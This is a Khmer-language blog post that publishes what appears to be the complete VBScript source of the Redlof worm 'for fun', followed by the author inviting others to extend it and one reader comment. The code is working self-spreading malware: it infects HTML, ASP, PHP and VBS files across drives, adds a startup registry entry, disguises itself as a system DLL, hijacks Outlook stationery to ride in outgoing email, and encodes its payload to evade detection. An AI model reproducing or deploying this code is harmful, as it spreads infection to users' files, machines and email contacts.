បង្កើតមេរោគ html.redlof.a ទុកលេងកំសាន្ត


Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk
Sub KJ_start()
KJSetDim()
KJCreateMilieu()
KJLikeIt()
KJCreateMail()
KJPropagate()
End Sub

Function KJAppendTo(FilePath,TypeStr)
On Error Resume Next
Set ReadTemp = FSO.OpenTextFile(FilePath,1)
TmpStr = ReadTemp.ReadAll
If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then
ReadTemp.Close
Exit Function
End If
If TypeStr = "htt" Then
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,2)
FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText
FileTemp.Close
Set FAttrib = FSO.GetFile(FilePath)
FAttrib.attributes = 34
Else
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,8)
If TypeStr = "html" Then
FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
ElseIf TypeStr = "vbs" Then
FileTemp.Write vbCrLf & VbsText
End If
FileTemp.Close
End If
End Function

Function KJChangeSub(CurrentString,LastIndexChar)
If LastIndexChar = 0 Then
If Left(LCase(CurrentString),1) =< LCase("c") Then
KJChangeSub = FinalyDisk & ":\"
SubE = 0
Else
KJChangeSub = Chr(Asc(Left(LCase(CurrentString),1)) - 1) & ":\"
SubE = 0
End If
Else
KJChangeSub = Mid(CurrentString,1,LastIndexChar)
End If
End Function

Function KJCreateMail()
On Error Resume Next
If InWhere = "html" Then
Exit Function
End If
ShareFile = Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm"
If (FSO.FileExists(ShareFile)) Then
Call KJAppendTo(ShareFile,"html")
Else
Set FileTemp = FSO.OpenTextFile(ShareFile,2,true)
FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
FileTemp.Close
End If
DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")
OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer")
WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)
Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)
WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settingsa0d020000000000c00000000000004601e0360","blank")
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settingsa0d020000000000c00000000000004601e0360","blank")
WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")
KJummageFolder(Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery")
End Function

Function KJCreateMilieu()
On Error Resume Next
TempPath = ""
If Not(FSO.FileExists(WinPath & "WScript.exe")) Then
TempPath = "system32\"
End If
If TempPath = "system32\" Then
StartUpFile = WinPath & "SYSTEM\Kernel32.dll"
Else
StartUpFile = WinPath & "SYSTEM\Kernel.dll"
End If
WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",StartUpFile
FSO.CopyFile WinPath & "web\kjwall.gif",WinPath & "web\Folder.htt"
FSO.CopyFile WinPath & "system32\kjwall.gif",WinPath & "system32\desktop.ini"
Call KJAppendTo(WinPath & "web\Folder.htt","htt")
WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\","dllfile"
WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type","application/x-msdownload"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\","VBScript"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath & TempPath & "WScript.exe ""%1"" %*"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"
Set FileTemp = FSO.OpenTextFile(StartUpFile,2,true)
FileTemp.Write VbsText
FileTemp.Close
End Function

Function KJLikeIt()
If InWhere <> "html" Then
Exit Function
End If
ThisLocation = document.location
If Left(ThisLocation, 4) = "file" Then
ThisLocation = Mid(ThisLocation,9)
If FSO.GetExtensionName(ThisLocation) <> "" then
ThisLocation = Left(ThisLocation,Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation)))
End If
If Len(ThisLocation) > 3 Then
ThisLocation = ThisLocation & "\"
End If
KJummageFolder(ThisLocation)
End If
End Function

Function KJMailReg(RegStr,FileName)
On Error Resume Next
RegTempStr = WsShell.RegRead(RegStr)
If RegTempStr = "" Then
WsShell.RegWrite RegStr,FileName
End If
End Function

Function KJOboSub(CurrentString)
SubE = 0
TestOut = 0
Do While True
TestOut = TestOut + 1
If TestOut > 28 Then
CurrentString = FinalyDisk & ":\"
Exit Do
End If
On Error Resume Next
Set ThisFolder = FSO.GetFolder(CurrentString)
Set DicSub = CreateObject("Scripting.Dictionary")
Set Folders = ThisFolder.SubFolders
FolderCount = 0
For Each TempFolder in Folders
FolderCount = FolderCount + 1
DicSub.add FolderCount, TempFolder.Name
Next
If DicSub.Count = 0 Then
LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
CurrentString = KJChangeSub(CurrentString,LastIndexChar)
SubE = 1
Else
If SubE = 0 Then
CurrentString = CurrentString & DicSub.Item(1) & "\"
Exit Do
Else
j = 0
For j = 1 To FolderCount
If LCase(SubString) = LCase(DicSub.Item(j)) Then
If j < FolderCount Then
CurrentString = CurrentString & DicSub.Item(j+1) & "\"
Exit Do
End If
End If
Next
LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
CurrentString = KJChangeSub(CurrentString,LastIndexChar)
End If
End If
Loop
KJOboSub = CurrentString
End Function

Function KJPropagate()
On Error Resume Next
RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"
DiskDegree = WsShell.RegRead(RegPathValue)
If DiskDegree = "" Then
DiskDegree = FinalyDisk & ":\"
End If
For i=1 to 5
DiskDegree = KJOboSub(DiskDegree)
KJummageFolder(DiskDegree)
Next
WsShell.RegWrite RegPathValue,DiskDegree
End Function

Function KJummageFolder(PathName)
On Error Resume Next
Set FolderName = FSO.GetFolder(PathName)
Set ThisFiles = FolderName.Files
HttExists = 0
For Each ThisFile In ThisFiles
FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))
If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then
Call KJAppendTo(ThisFile.Path,"html")
ElseIf FileExt = "VBS" Then
Call KJAppendTo(ThisFile.Path,"vbs")
ElseIf FileExt = "HTT" Then
HttExists = 1
End If
Next
If (UCase(PathName) = UCase(WinPath & "Desktop\")) Or (UCase(PathName) = UCase(WinPath & "Desktop"))Then
HttExists = 1
End If
If HttExists = 0 Then
FSO.CopyFile WinPath & "system32\desktop.ini",PathName
FSO.CopyFile WinPath & "web\Folder.htt",PathName
End If
End Function

Function KJSetDim()
On Error Resume Next
Err.Clear
TestIt = WScript.ScriptFullname
If Err Then
InWhere = "html"
Else
InWhere = "vbs"
End If
If InWhere = "vbs" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WsShell = CreateObject("WScript.Shell")
Else
Set AppleObject = document.applets("KJ_guest")
AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance()
Set WsShell = AppleObject.GetObject()
AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
AppleObject.createInstance()
Set FSO = AppleObject.GetObject()
End If
Set DiskObject = FSO.Drives
For Each DiskTemp In DiskObject
If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then
Exit For
End If
FinalyDisk = DiskTemp.DriveLetter
Next
Dim OtherArr(3)
Randomize
For i=0 To 3
OtherArr(i) = Int((9 * Rnd))
Next
TempString = ""
For i=1 To Len(ThisText)
TempNum = Asc(Mid(ThisText,i,1))
If TempNum = 13 Then
TempNum = 28
ElseIf TempNum = 10 Then
TempNum = 29
End If
TempChar = Chr(TempNum - OtherArr(i Mod 4))
If TempChar = Chr(34) Then
TempChar = Chr(18)
End If
TempString = TempString & TempChar
Next
UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)"
ThisText = "ExeString = """ & TempString & """"
HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document.write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 code=com.ms.""&""activeX.Active""&""XComponent>" & "<" & "/APPLET>" & "<" & "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>"
VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"
WinPath = FSO.GetSpecialFolder(0) & "\"
If (FSO.FileExists(WinPath & "web\Folder.htt")) Then
FSO.CopyFile WinPath & "web\Folder.htt",WinPath & "web\kjwall.gif"
End If
If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then
FSO.CopyFile WinPath & "system32\desktop.ini",WinPath & "system32\kjwall.gif"
End If
End Function

ខ្ញុំអត់ចេះទេ ទុកឲ្យអ្នកចង់សាកគេធ្វើបន្ថែមទៀត  ក្រែងគេប្រាប់ខ្ញុំបន្ថែមដែរ  ^_^
Advertisements

About Nataro

ក្នុងលោក គ្មានអ្វីដែលល្អគ្រប់ដប់នោះទេ
This entry was posted in កុំព្យូទ័រ, ចំនេះដឹង and tagged , , . Bookmark the permalink.

2 Responses to បង្កើតមេរោគ html.redlof.a ទុកលេងកំសាន្ត

  1. hangpanha ថា:

    តើមេរោគនឹងវាមានសម្ថភាពអីគេតៅ??

ឆ្លើយ​តប

Fill in your details below or click an icon to log in:

ឡូហ្កូ WordPress.com

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី WordPress.com របស់​អ្នក​។ Log Out /  ផ្លាស់ប្តូរ )

Google+ photo

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី Google+ របស់​អ្នក​។ Log Out /  ផ្លាស់ប្តូរ )

រូប Twitter

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី Twitter របស់​អ្នក​។ Log Out /  ផ្លាស់ប្តូរ )

រូបថត Facebook

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី Facebook របស់​អ្នក​។ Log Out /  ផ្លាស់ប្តូរ )

w

កំពុង​ភ្ជាប់​ទៅ​កាន់ %s